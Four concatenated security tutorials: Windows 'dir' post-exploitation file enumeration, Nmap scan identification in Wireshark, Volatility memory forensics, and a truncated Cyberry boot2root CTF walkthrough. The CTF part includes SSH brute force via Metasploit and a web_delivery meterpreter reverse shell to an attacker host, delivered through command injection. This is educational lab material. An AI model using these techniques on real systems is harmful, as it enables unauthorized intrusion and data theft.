---

Post Exploitation in Windows using dir Command

January 16, 2018, 1:55 am

≫ Next: Forensic Investigation of Nmap using Wireshark

≪ Previous: Forensic Data Carving using Foremost

$

0

0

In this article you will learn how to use Windows Command Line Command “dir” and extract files, get information about Number of files of a particular extension and much more using Metasploit framework. 

dir Command: It displays a list of a directory's files and subdirectories.

Syntax

dir [:] [] [] [/p] [/q] [/a [[:] ]] [/s] [/b]

[/p]:Displays one screen of the listing at a time.

[/q]:Displays file ownership information.

[/s]:Lists every occurrence of the specified file name within the specified directory and all subdirectories.

[/b]:Displays a bare list of directories and files, with no additional information.

[/a]:Attributes (Additional Options).

It is usually attached with options such as

[/ad]: Directories

[/ah]: Hidden files

[/as]: System files

[/a-attribute]: Not (It is used when opposite of the attribute is to be obtained)

Now to use dir for Post Exploitation, we will need an Administrator Privileged shell, which can be found here.

Now we will use different combinations of the attributes and parameters to extract data from victim’s system.

Find Directories using a search string

Here, we are using following options with dir command:

[/b] to get a bare search,

[/s] to get a verbose result,

[/ad] to get the list of directories,

Containing string *sales*in their name.

Syntax: dir /b /s /ad [directory]\*string*

Example:  dir /b /s /ad d:\*sales*

Find the Number of Files/Directories in a Directory

If we need the Number of files, i.e. no. of files we have to add find command by piping [|] it with dir.

 Example:dir /b | find /c /v “”

Here [/b] to get a bare search and [/c] switch tells the find tool to Number how many lines contain your search terms, and [/v] switch will show any lines that don’t contain the string of words which you have specified in this case “”. As a file name cannot be nothing (“”) so it will Number all the file names.

Here, we are using

Above command return number of files in the Directory you are currently in. In my case it returns 22, which means victim has 22 files in his D:\ directory.

Find the Number of files

Here, we are using

Example: dir /b /s /a-d d:\*sales* | find /c /v “”

[/ad] is for Directories.

[-] is used as NOT so [/a-d] is for not directories i.e. files

Also find /c /v “” is used to get the Number. From given below image you can observe here it found 5 files inside sales folder.

Find the Number of directories

Syntax: dir /b /s /ad [directory]\*string* | find /c /v “”

Example: dir /b /s /ad d:\*sales* | find /c /v ””

Here we need to get the Number of directories named *sales* It can be anything mentioned in *string*.

[/ad] is for Directories

Here find /c /v ””is used to get a Number and from given below image you can observe here it found 5 subdirectories inside sales folder.

Find Files of a particular extension

In the given example, I searched for .xlsx files which are MS-Excel Files, but we can use it for any extension file like pdf, png, exe, docs etc.

Syntax: dir /b /s [directory]\*extension*

Example: dir /b /s d:\*.xlsx*

From given below image you can read name of excelfiles inside D: drive.

Find the Number of Files of a particular Extension

If we add find /c /v”” we will get the Number of files of a particular extension as shown below.

Example: dir /b /s d:\*.xlsx* | find /c /v “”

 From given below image you can observe here it found 4 excelfiles inside D: drive.

Find the Number of Hidden Files/Directories

To get hidden files we will use the attribute [/ah].

And when combined with find /c /v “”, we will get the Number of the hidden files/directories in the given directory as shown below.

Syntax: dir /b /ah [directory] | find /c /v “”

Example: dir /b /ah d:\ | find /c /v “”

From given below image you can observe here it found 3 hiddenfiles inside D: drive.

Find the Hidden Files/Directories in a Directory

To view the Hidden Files in the give directory we will use attribute [/ah] with [/b] to get a bare result of the hidden files.

Syntax: dir /b /ah [directory]

Example: dir /b /ah d:\

From given below image you can read name of hiddenfiles inside D: drive.

Find the System Files Stored in a Directory

To get the System Files we will use another attribute which is [/as], combined with [/b] it will give the names of the system files stored in the given directory.

Example: dir /b /as d:\

From given below image you can read name of system files inside D: drive.

Forensic Investigation of Nmap using Wireshark

January 17, 2018, 12:31 am

≫ Next: Memory Forensics Investigation using Volatility (Part 1)

≪ Previous: Post Exploitation in Windows using dir Command

$

0

0

Hello friends!! Today we are discussing about how to read hexadecimal bytes from an IP Packet that help a network admin to identify various types of NMAP scanning. But before moving ahead please read our previous both articles “Network packet forensic” and “NMAP scanning with Wirehsark” it will help you in better understanding of this article.

Requiremnt

Attacking tool: Namp

Analyis tool: wireshark

We are going to calculate hexadecimal bytes of wireshark using given below table and as we know wireshark capture network packet mainly of 4 layers which is describd below in table as per OSI layer model and TCP/IP layer model.

Layer Captured by Wireshark	TCP/IP layer as per Wireshark	OSI layer as per Wireshark
Ethernet Header	L1 Network Interface Layer	L2 Data Link Layer
IP Header	L2 Internet Layer	L3 Network Layer
TCP/UDP Header	L3 Transport Layer	L4 Transport layer
Application Header	L4 Application Layer	L7 Applcation Layer

Let’s  start!!

NMAP ARP Scanning

Hopefully reader must be aware of basic NMAP scanning techniques if not then read it from here, now open the terminal and execute given below command which known as “HOST SCAN” to idenfiy live host in network.

nmap -sn 192.168.1.100

Nmap uses the –sP/-sn flag for host scans and broadcast ARP request packet to identify which IP is allocated to particular host machine. From given below image you can observe that “1 host up” message.

Working of ARP Scan for Live Host

         i.            Send ARP request for MAC address

       ii.            Receive MAC address though ARP Reply packet

Step to Identify NMAP ARP Scan

1. Collect Ethernet Header details

Here we used wireshark to capture the network packet coming from victim’s network and in order to analysis only ARP packet we have applied filter “ip.addr == VICTIM IP || arp” as shown in given below image. Here you will find 2 arp packets, basically the 1st arp packet is broadcasting IP for asking MAC address of that network and the 2nd packet is unicast contains Answer of IP query.

Now let’s read Hex value of Ethernet header for identifying source and destination Mac addresses along with that we can also enumerated the bytes used for encapsulated packet, in order to identifying Ether type is being used here.

Ethernet header 14 bytes	Destination MAC Address 6 Bytes	Source MAC Address 6 Bytes	Ether Type 2 Bytes
Bits Color	Brown	Pink	Yellow
Hexadecimal value	ff:ff:ff:ff:ff:ff:ff	00:0c:29:d1:8e:0c	0806

There should’nt be any uncertainty in conercn with source Mac address who is responsible for sending packet but if we talk about Destination Mac address then we got ff:ff:ff:ff:ff:ff:ff which means exact Destination is machine is not available here. Further moving ahead we found Ethertype 0x0806 highlighted in yellow color is used for ARP protocol.

Hence from Ethernet header we can conclude it as ARP broadcast packet asking for destination Mac address.

1. Collect ARP Header (Request/Reply)

In order to identify ARP scan you need to investigate some important parameters which could help a network admin to make correct assumption in concern of ARP scann.

Try to collect following details as given below:

·         Opcode (Request/Reply)

·         Source Mac

·         Source IP

·         Destination MAC

·         Destination IP 

Now with help of following table you can read the hex value highlighted in above and below image for ARP Request and Reply packets  respectively.

ARP Header  =>	Opcode	Source Mac	Source IP	Destination MAC	Destination IP
Bits Color	Brown	Red	Green	Purple	Orange
ARP Request Hex Value	01	00:0c:29:d1:8e:0c	C0.a8.01.67	00:00:00:00:00:00	C0.a8.01.64
Decimal value of Request	1	No need	192.168.1.103	No need	192.168.1.100
ARP Reply Hex Value	02	Fc:aa:14:6a:9a:a2	C0.a8.01.64	00:0c:29:d1:8e:0c	C0.a8.01.67
Decimal Value of Reply	2	No need	192.168.1.100	No need	192.168.1.103

NMAP ICMP Scanning

Now execute given below command which known as “HOST SCAN” to identify live host in network by sending Ping request with the help of ICMP packet.

nmap -sn 192.168.1.100 –disable-arp-ping

Now above command will send ICMP request packet instead of ARP request for identifying live host in network.

Working of NMAP ICMP Ping when host is live:

         i.            Send ICMP echo request packet.

       ii.            Receive ICMP echo reply.

      iii.            Send TCP SYN packet on any TCP port (this port must be rarely blocked by network admin).

     iv.            Receive TCP RST-ACK from target’s Network.

As a result NMAP give “HOST UP” message as shown in given below image.

Step to Identify NMAP ICMP Scan

1.       Collect IP Header Details  for Protocol version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Since we know ICMP is Layer 3 protocol according to OSI model therefore we need to focus on following details for ICMP forensic with help of IP Header of a packet.

Try to collect following details as given below:

·         Ip header length 20 Bytes (5bits*4=20 bytes)

·         Protocol (01 for ICMP)

·         Source IP

·         Destination IP

From given below image you can observe Hexadecimal information of IP header field and using given table you can study these value to obtain their original value.

IP header (20 bytes)	Header length	Protocol	Source IP	Destination IP
Bits Color	Brown	Red	Pink	Orange
Hex Value	5	01	C0.a8.01.67	C0.a8.01.64
Decimal value	5	1	192.168.1.103	192.168.1.100

The IP header length is always given in form of bit and here it is 5 bit which is also minimum IP header length and to make it 20 bytes multiple 5 with 4 i.e. 5*4 bytes =20 bytes.

1. Identify ICMP Message type  (Request /Reply)

Now we had discussed above according to Nmap ICMP scanning technique the 1st packet is should be ICMP echo request packet and 2nd packetis should be of ICMP echo replypacket.

Now with help of following table you can read hex vaule highlighted in above and below image for ICMP Request and Reply packets  respectively.

IP Header  =>	ICMP Type	Source IP	Destination IP
Bits color	Yellow	Pink	Orange
ICMP  Echo Request Hex Value	08	C0.a8.01.67	C0.a8.01.64
Decimal value of Request	8	192.168.1.103	192.168.1.100
ICMP  Echo Reply Hex Value	00	C0.a8.01.64	C0.a8.01.67
Decimal Value of Reply	0	192.168.1.100	192.168.1.103

1. Identify TCP Flags

AS discussed above after ICMP reply, the 3rd packet should be of TCP-SYN packet and 4^thshould be of TCP-RST/ACK.  We had seen in our previous article the hex value of all TCP-Flags are different from each other, so if we are talking for TCP-SYN flag then its Hex value should 0x02.

From given below table you can observe the sequence of TCP flag and how bits of these flag are set for sending packet to destination port.

For example if you found TCP SYN packet then the bit for SYN flag is set 1 for which the binary value will be 000000010 and its hexadecimal will be 0x02.

NS	CWR	ECE	URG	ACK	PSH	RST	SYN	FIN
0	0	0	0	0	0	0	1	0

Sometime you will get combination of two or more flag in TCP header, so in that scenario take the help of following table to read the Hex value of such packet to identify TCP flags bits are being set 1.

For example if you found TCP SYN/ACK packets then indicates that SYN & ACK flags are set 1 for which the binary value will be 000010010and its hexadecimal will be 0x12

NS	CWR	ECE	URG	ACK	PSH	RST	SYN	FIN
0	0	0	0	1	0	0	1	0

Therefore I design below table to let you know more about of Hex value when  two or more than two flags are set 1.

TCP  Flag	Decimal Value	HexValue
SYN + ACK	2 + 16 = 18	2 + 10 = 12
RST + ACK	4 + 16 = 20	4 + 10 = 14
PSH + ACK	8 + 16 = 24	8 + 10 = 18
FIN + PSH + URG	1 + 8 + 32 = 41	1+ 8 + 20 = 29
URG	32	20
ACK	16	10
PSH	8	08
RST	4	04
SYN	2	02
FIN	1	01

The image given above contains the hex value of TCP-SYN packets and the image given below contains the hex value of TCP-RST/ACK packet from which we can calculate the source port and the destination port of the packet respectively like one given below.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –SYN  Packets Hex value	C8 a2	01 bb	02
Decimal Value	51362	443	2
TCP-RST/ACK packet Hex value	01 bb	C8 a2	14
Decimal Value	443	51362	20

Conclusion!So as stated above regarding the working of NMAP ICMP scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP ICMP scan for Network enumeration.

Default NMAP Scan (Stealth Scan)

Here we are going  with default scan method to enumerate “open”state of any specific port

nmap -p 80 192.168.1.100

Working of Default Scan for open port:

         i.            Send TCP-SYN packet

       ii.            Receive TCP-SYN/ACK

3. Send TCP-RST packet

It is also known as half Open TCP Scan as it does not send ACK packet after receive SYN/ACK packet .

Step to Identify NMAP Default Scan (Stealth Scan)

1.       Collect IP Header Details  for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800.

Try to collect following details as given below:

·         Ip header length 20 Bytes (5bits*4=20 bytes)

·         Protocol (6 for TCP)

·         Source IP

·         Destination IP

From given below image you can observe Hexadecimal information of IP header field and using given table you can study these value to obtain their original value.

IP header (20 bytes)	Header length	Protocol	Source IP	Destination IP
Bits Color	Brown	Red	Pink	Orange
Hex Value	5	06	C0.a8.01.67	C0.a8.01.64
Decimal value	5	6	192.168.1.103	192.168.1.100

1. Analysis TCP Header  Details

Since from above image we had obtain Source and Destination IP and protocol used for communication i.e. TCP, now we need to identify source and Destination port and TCP Flag used for establishing connection between two system.

In image we have highlighted source port in “Light brown” color and destination port in “yellow color”, you can use given below table to read the hex value of given image.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –SYN  Packets Hex value	92 62	00 50	0x02
Decimal Value	38498	80	2

So we come to know that here TCP-SYN packet is used for sending connection request on Port 80.

Again we read next packet then here we found hex value 12indicates that TCP-SYN/ACK has been send from port 80.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –SYN/ACK  Packets Hex value	00 50	92 62	0x12
Decimal Value	80	38498	18

Take the help given above table to read the hex vaule of given image. Hex value 12 for TCP flag is used for SYN + ACK as explained above,  and we get 0x12 by adding Hex value “ 0x02 of SYN” and “0x10 of ACK”. 

In the image given below we come to know that TCP-RST packet is used for sending Reset connection to Port 80.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –RST Packets Hex value	96 62	00 50	0x04
Decimal Value	38498	80	4

Conclusion!So as declared above regarding the working of NMAP default scan or NMAP stealth scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP Default scan for Network enumeration.

NMAP TCP Scan

Here we are going  with TCP scan to enumerate state of any specific port

nmap  -sT  -p 80 192.168.1.100

Working of Default Scan for open port:

         i.            Send TCP-SYN packet

       ii.            Receive TCP-SYN/ACK

3. Send TCP-ACK packet
4. Send TCP-RST/ACK packet

Step to Identify NMAP TCP Scan  

1.       Collect IP Header Details  for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800.

Try to collect following details as given below:

·         Ip header length 20 bytes (5bits*4=20 bytes)

·         Protocol (06 for TCP)

·         Source IP

·         Destination IP

IP header (20 bytes)	Header length	Protocol	Source IP	Destination IP
Bits Color	Brown	Red	Pink	Orange
Hex Value	5	06	C0.a8.01.67	C0.a8.01.64
Decimal value	5	6	192.168.1.103	192.168.1.100

It is quite similar as NMAP stealth Scan and using given table you can study these values to obtain their original value.

1. Analysis TCP Header  Details

NMAP TCP Scan follow 3 way handshak of TCP connection for enumeration open port. Identfying source and destination port along with Flag hex value (TCP-SYN) is similar as above.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –SYN  Packets Hex value	87 a4	00 50	0x02
Decimal Value	34724	80	2

So we come to know that here TCP-SYN packet is used for sending connection request on Port 80.

Again we read next packet then here we found hex value 12 indicates that TCP-SYN/ACK has been send via port 80.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –SYN/ACK  Packets Hex value	00 50	87 a4	12
Decimal Value	80	34724	18

The only difference between Stealth Scan and TCP scan is that here packet of ACK flag is send by source machine who intiate the TCP communication.  Again we read next packet then here we found hex value 0x10 indicates that TCP- ACK has been send via port 80.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –ACK Packets Hex value	87 a4	00 50	10
Decimal Value	34724	80	16

Conclusion! So as stated above regarding the working of NMAP TCP scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP Default scan for Network enumeration.

NOTE:  For  packet TCP-RST/ACK the hex value will be “ 0x14” send by the attacker machine

NMAP FIN Scan

Here we are going  with TCP-FIN scan to enumerate “OPEN” state of a particular port in any Linux based system therfore excute given below command.

nmap  -sF  -p 22 192.168.1.104

Working of FIN Scan for open port: Send  2 packets of TCP-FIN on a specific port

FIN is part TCP flag and NMAP used FIN flag to intiat TCP communication instead of following three way handshak communication.

Step to Identify NMAP FIN Scan  

1.       Collect IP Header Details  for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

·         Ip header length 20 Bytes (5bits*4=20 bytes)

·         Protocol (06 for TCP)

·         Source IP

·         Destination IP

It is quite similar as NMAP above Scan and using given below table you can study these values to obtain their original value.

IP header (20 bytes)	Header length	Protocol	Source IP	Destination IP
Bits Color	Brown	Red	Pink	Orange
Hex Value	5	06	C0.a8.01.67	C0.a8.01.68
Decimal value	5	6	192.168.1.103	192.168.1.104

1. Analysis TCP Header  Details

Now lets Identfying source and destination port along with Flag hex value (TCP-FIN) is similar as above.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP –FIN Packets Hex value	90 5c	00 16	01
Decimal Value	36956	22	1

So through given below image and with help of table we came to know that here TCP-FIN packet is used for sending connection request on Port 22.

Conclusion!So as declared above regarding the working of NMAP FIN scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP FIN scan for Network enumeration.

NOTE:  If  you found 1st FIN packet (0x01) and 2^ndRST packet (0x04) then indicates “Closed Port” on tagered network.

NMAP NULL Scan

Here we are going  with TCP Null scan to enumerate “OPEN” state of any specific port in any Linux based system.

nmap  -sN  -p 22 192.168.1.104

Working of Null Scan for open port: Send  2 packets of TCP-NONE on specific port

Here NMAP used NONE flag  (No flag) to initiate TCP communication and bit of each flag is set “0”instead of following three-way handshake communication.

Step to Identify NMAP Null Scan  

1.       Collect IP Header Details  for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

·         Ip header length 20 Bytes (5bits*4=20 bytes)

·         Protocol (06 for TCP)

·         Source IP

·         Destination IP

It is quite similar as NMAP above Scan and using given table you can study these values to obtain their original value.

IP header (20 bytes)	Header length	Protocol	Source IP	Destination IP
Bits Color	Brown	Red	Pink	Orange
Hex Value	5	06	C0.a8.01.67	C0.a8.01.68
Decimal value	5	6	192.168.1.103	192.168.1.104

1. Analysis TCP Header  Details

Now lets Identfying source and destination port along with Flag hex value (TCP-NONE) is similar as above.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP -NONE  Packets Hex value	Af 76	00 16	0x00
Decimal Value	44918	22	0

So through given below image and with help of table we come to know that here TCP-NONE packet is used for sending connection request on Port 22.

Conclusion! So as stated above regarding the working of NMAP NONE scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that someone has Chosen NMAP NONE scan for Network enumeration.

NOTE:  If  you found 1st NONE packet (0x00) and 2^ndRST packet (0x04) then indicates “Closed Port” on tagered network.

NMAP XMAS Scan

Here we are going with XMAS scan to enumerate “OPEN” state of any specific port in any Linux based system

nmap  -sX  -p 22 192.168.1.104

Working of XMAS Scan for open port: Send 2 packets of TCP Flags in combination of FIN, PSH, URG on specific port.

Here NMAP used 3 TCP flags (FIN, PSH, and URG) to initiate TCP communication and bit of each flag is set “1”instead of following three way handshake communications.

Step to Identify NMAP XMAS Scan  

1.       Collect IP Header Details  for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

·         Ip header length 20 Bytes (5bits*4=20 bytes)

·         Protocol (06 for TCP)

·         Source IP

·         Destination IP

It is quite similar as NMAP above Scan and using given table you can study these values to obtain their original value.

IP header (20 bytes)	Header length	Protocol	Source IP	Destination IP
Bits Color	Brown	Red	Pink	Orange
Hex Value	5	06	C0.a8.01.67	C0.a8.01.68
Decimal value	5	6	192.168.1.103	192.168.1.104

1. Analysis TCP Header  Details

Now lets Identfying source and destination port along with Flag hex value (TCP-XMAS) is similar as above.

TCP Header	Source Port	Destination Port	Hex value of Flag
Bits Color	Light Brown	Yellow	Green
TCP -{FIN,PSH,URG} Packets Hex value	Cc f5	00 16	0x29
Decimal Value	52469	22	41

So through given below image and with help of table we come to know that here TCP flags {FIN,PSH,URG} packet is used for sending connection request on Port 22.

Conclusion! So as stated above regarding the working of NMAP XMAS scan we had obtain the hex value for every packet in same sequence.

Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that someone has Choose NMAP XMAS scanned for Network enumeration.

NOTE: 

·         If you found 1st {FIN, PSH, URG} packet (0x29) and 2nd RST packet (0x04) then indicates “Closed Port” on targeted network.

·         NMAP FIN, NMAP NULL and NMAP XMAS scan are only applicable on Linux based system

NMAP UDP Scan

Here we are going  with XMAS scan to enumerate state of any specific port in any Linux based system

nmap  -sU  -p 68 192.168.1.104

Working of XMAS Scan for open port: Send  2 packets of UDP on specific port

It is quite different from TCP communication process because here no Flag are used for establishing connection or initiate connection request with target’s network.

Step to Identify NMAP UDP Scan  

1.       Collect IP Header Details  for Protocol Version

For reading data of Ethernet head visit to our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect following details as given below:

·         Ip header length 20 Bytes (5bits*4=20 bytes)  

·         Protocol (11 for UDP)

·         Source IP

·         Destination IP

It is quite similar as NMAP above Scan as “IP header” and “Ethernet header” information will be same either is TCP communication or UDP communication and using given table you can study these values to obtain their original value.

IP header (20 bytes)	Header length	Protocol	Source IP	Destination IP
Bits Color	Brown	Red	Pink	Orange
Hex Value	5	11	C0.a8.01.67	C0.a8.01.68
Decimal value	5	17	192.168.1.103	192.168.1.104

Basically 11 is hex value use for UDP protocol which is quite useful in identify NMAP UDP scan from remanding scanning method.

1. Analysis UDP Header  Details

Now lets Identfying source and destination port a as done above inTCP Scanning.

TCP Header	Source Port	Destination Port
Bits Color	Light Brown	Yellow
UDP Packets Hex value	82 75	00 44
Decimal Value	33397	68

Conclusion!Obtaining the hex value for every packet in such sequence gives indication to the Penetration tester that Someone has Choose NMAP UDP scan for Network enumeration.

NOTE:  If  you found 1st UDP packet and 2^nd UDP with ICMP Message Port is unreachable then indicates “Closed Port” on tagered network.

Memory Forensics Investigation using Volatility (Part 1)

January 20, 2018, 12:45 am

≫ Next: Hack the VM Cyberry:1(Boot2root Challenge)

≪ Previous: Forensic Investigation of Nmap using Wireshark

$

0

0

Our focus today is on the Volatility framework, on its capability of analyzing process activity.

The Volatility framework is an open source tool that is used to analyze volatile memory for a host of things. This framework comes with various plugins that can be used by the investigators to get an idea of what was going on in the machine when it was being used. Volatile memory is the primary storage of most computers, by primary storage I’m referring to the RAM.

If live acquisition is done for a piece of evidence, an image of the volatile memory can hold various clues that can help an investigation, for instance: passwords, services, network activity, processes, etc. All these can be acquired from live memory.

In another instance, after an incident, volatility can be used to uncover the cause. It has plugins that let you sift through the primary storage and pinpoint suspicious processes that might have been running at the time of the incident or might have led up to it.

This framework is available for both Windows and Linus, for this demonstration we will be using Volatility in Kali Linux, it comes preinstalled and can be found under the Forensics menu.

We have used Dumpit to create the .raw file for 2 GB of RAM from a machine running Windows 10.

All you need to do it download the program, run it and press “y” and it does the rest.

Navigate to the address given in front of the Destination, as it is shown in the image above and you will find the .raw file that contains the information copied from the RAM, this can now be subjected to the Volatility framework.

For ease of usage, create a folder by the name of “Volatility” on the Kali desktop and place the .raw file we crated in it. Right click anywhere in the folder and choose “Open in Terminal”.

Let’s fire up Volatility in Kali, navigate to the Forensics menu or, in the terminal type ‘volatility –h”.

This command will show you a host of plugins that are available in Volatility and the usage pattern. We will be using a different .raw file that we acquired earlier, so don’t be thrown off by the change in file name.

As an investigator, one is working under the pretense that this is a file we have no prior knowledge about so, we must start from scratch.

The first thing to ascertain is the profile, that is, the operating system that that this was most probably derived from.

Type “volatility –f name of file.raw imageinfo”. A breakdown of the command for further reference:

-f is to tell declare the target file.

Imageinfo is used to get the basic details about the file, including the profile. The plugin uses the kernel debugger data block to guess the profile.

In the image above we can see that Volatility is telling us that this image is most probably belongs to the Win10*64_10586 profile. The guessing aspect of the plugin bases it’s functionality on another plugin called kdbgscan. The kdbgscan analyses the data structures present in the NT kernel module, there are numeric values that denote the minor and major build numbers and service pack level.

To illustrate, let’s run the kdbgscan.

Type “volatility –f name of file.raw kdbgscan”.

The result for the profile that we will be using is this one.

The data given below tells us that the file belongs to a 64-Bit version of Windows 10, has no installed service pack, has a total of 177 loaded modules and 82 active processes.

Volatility gives us the option to manually override the profile (--profile) while using plugins as the automatic OS detection can be misled due to accidental or intended tampering of the kernel by malware, this gives us a higher rate of accuracy in the operations we perform. We will be using this override function throughout combined with the plugins.

The machine might have been running certain processes, the plugin we will be using is pslist.  

Type “volatility –f name of file.raw --profile Win10*64_10586 pslist”

The scan will show us the following results. We can see OneDrive and Skype being run on the machine so we can infer that it is most probably a client or workstation rather than a server. All the system processes are running on session 0 and 1, which infers that only 1 user was logged on.

The pstree plugin is used to see the parent child relationship between processes, it takes the output from the pslist and depicts it in a tree view format.

Type “volatility –f name of file.raw --profile Win10*64_10586 pstree”

If you were to start a program from the desktop by double clicking an icon, its parent would be explorer.exe, that’s the windows explorer.

The reason way pstreemakes its relevance in forensics can be thought of in the following way: if you see chrome.exe being executed by command shell (cmd.exe) that is a potential flag. It could have been executed by a hacker who has access to the machine.

In the result shown, we can see that wininit.exe started services.exe, which in turn started svchost.exe.

The psscan plugin is uses the ­_EPROCESS objects, it can be used to determine hidden and terminated processes.

Type the following “volatility –f name of file.raw --profile Win10*64_10586 psscan”

The scan shows us the one of the processes by the name of TabTip.exe started and stopped within a second, it’s a process that is used by windows touch screen devices for touch keyboard and handwriting, by this we can infer the device did not have touch screen capabilities. Not the most potent of discoveries but it helps build a profile for further investigation.

The offsetis the displacement between the beginning of the data object to a certain point.

The last plugin we will be utilizing will be psxview. This plugin is useful for uncovering malicious processes, the way it assists in this is by locating processes that are using alternative listings. The list can then be cross-referenced with different sources of information to pinpoint discrepancies.

Type the following “volatility –f name of file.raw --profile Win10*64_10586 psxview”

The psxview enumerates every single process by Process Object scanning, thread scanning, CSRSS handle table, PspCid table, Sessions processes, Desktop threads and Active Processes Linked list. That’s 7 ways of enumeration.

The 7 things mentioned above can be understood as:

Process Object Scanning: is listing all the process objects that use the proc tag and are allocated nt!ps, there are process subsystems of the NT module.

Thread Scanning: this can be used backtrack to the originating process because each process must have one active thread.

CSRSS Handle Table: post execution is responsible for every process and creation and can help identify all _EPROCESS objects.

PspCid Table: holds reference to all process and thread objects and is located in the kernel memory.

Sessions Processes: associates all processes that belong to a single users logon.

Desktop Threads: structures that hold a list of all threads attached to each desktop, useful for finding the owing process of a thread.

Active Processes Linked List: list of running processes, each element comprising of data and a reference to the next element

This plugin is very useful and efficient at finding rootkits. One of the things that it focuses on it that, being able to successfully weaponize a process that is not hidden is far more practical and efficient than to hide a process 7 different ways.

Volatility is a very robust framework, it gives us the ability to further apply various filters to our scan results and generate reports. To make it more comprehensive in its usage and approach, its capabilities have been designed based on reverse engineering. It has capabilities far surpass even that of Microsoft’s own kernel debugger.

The tools provides a wealth of insights into the working of a machine, helping the investigator make accurate and coherent profiles, every bit of information gets the forensic process one step closer to uncovering the truth.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

Hack the VM Cyberry:1(Boot2root Challenge)

January 21, 2018, 5:15 am

≫ Next: Beginners Guide to Burpsuite Payloads (Part 1)

≪ Previous: Memory Forensics Investigation using Volatility (Part 1)

$

0

0

Hello friends! Today we are going to take another CTF challenge known as Cyberry: 1. the credit for making this vm machine goes to “Cyberry” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sT 192.168.0.18

Nmap scan shows us port 80 is open, so we open ip address in our browser.

We don’t find anything on the webpage we use nikto to find more information.

nikto -h http://192.168.0.18

Nikto scan shows us the login page. We open http://192.168.0.18/login.php on the browser.

We don’t find anything on the login page but a link to the main site http://192.168.0.18/berrypedia.html.

While going through the links on the page. I found an image called placeho1der.jpg

We convert it from negative image into normal image. And we find it was a picture of 4 artists Smiley Lewis, Dave Edmunds, Fats Domino and Gale Storm.

On further research I found that they all sang the same song “I hear you knocking”. From the name of the song and the port image, I concluded it had something to do with port knocking. So I used the release date of the song as the port.

knock 192.168.0.18 1970 1955 1955 1961

After port knocking we did a nmap scan to check if any port is open and we find that port 61955 opened after port knocking

nmap -p- 192.168.0.18

We try netcat but are showed nothing so we open it in our browser; we find that it is running the same website on a different port.

We use dirb to check if there are any different directories on this port.

dirb http://192.168.0.18:61955

We find a new directory http://192.168.0.18:61955/H, we open it and find brain-fuck encoded strings.

We use an online tool to decode the string 1 by 1 and we found a list of username and password. We save the username in one text file and the password in another.

Now we try to brute force ssh using these credentials. We use metasploit to brute force ssh.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.18

msf auxiliary(ssh_login) > set user_file /root/user.txt

msf auxiliary(ssh_login) > set pass_file /root/pass.txt

msf auxiliary(ssh_login) > run

We find that the username is mary and password is bakeoff, but we cannot connect through ssh using these credentials. So we use these to login through ftp.

ftp 192.168.0.18

After login through ftp we go inside .bash_history directory there we find 2 files.

We download it into our system and rename them.

get .reminder.enc /root/reminder

get .trash /root/trash

We check the file type and find that reminder is encrypted and trash contains password to decrypt it.

file reminder

file trash

cat trash

Now we use openssl to decrypt it. We create shell code to decrypt it as there are multiple passwords to be used and multiple types of encryption. We save it in files with name decrypted{encryption}{password}.

for i in ‘openssl enc -ciphers | tail -n +2’ ; do for j in ‘cat trash’; do openssl ${i:1} -d -salt -md md5 -in reminder -out “decrypted$i$j” -k $j; done;done 2>/dev/null

Now we check the decrypted files which contain ascii text.

file * | grep ASCII

We open the file that contains ASCII text and find it contains a password.

We use this password to login at http://192.168.0.18:61955/login.php. We use the username we used earlier to brute force ssh and find the username to be mary.

Now once we login we find a link to page.

When we open the link we find a page that does DNS lookup, it looks like it may be vulnerable to command injection.

Now we metasploit to exploit command injection using web_delivery.

msf > use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 192.168.0.12

msf exploit(multi/script/web_delivery) > set lport 4444

msf exploit(multi/script/web_delivery) > run

We use burpsuite to capture the request and execute the command given by metasploit to execute our shell.

As soon as we execute the command we get our reverse shell.

Now we use generate a python tty shell.

